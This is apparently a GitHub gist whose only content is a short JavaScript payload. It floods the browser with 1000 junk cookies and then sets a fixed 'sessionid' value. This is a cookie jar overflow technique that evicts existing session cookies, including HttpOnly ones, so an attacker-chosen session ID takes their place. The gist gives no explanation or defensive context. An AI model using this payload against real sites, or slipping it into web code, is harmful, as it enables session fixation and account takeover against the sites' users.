Skip to content

Instantly share code, notes, and snippets.

@LaRevoltage
Created June 20, 2022 18:15
Show Gist options
  • Save LaRevoltage/ba796f7d8e8a882686159c9183c68f76 to your computer and use it in GitHub Desktop.
Save LaRevoltage/ba796f7d8e8a882686159c9183c68f76 to your computer and use it in GitHub Desktop.
for (let i=0;i<1000;i++) {
document.cookie = "cookie"+i+"=overflow";
}
document.cookie = "sessionid=222"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment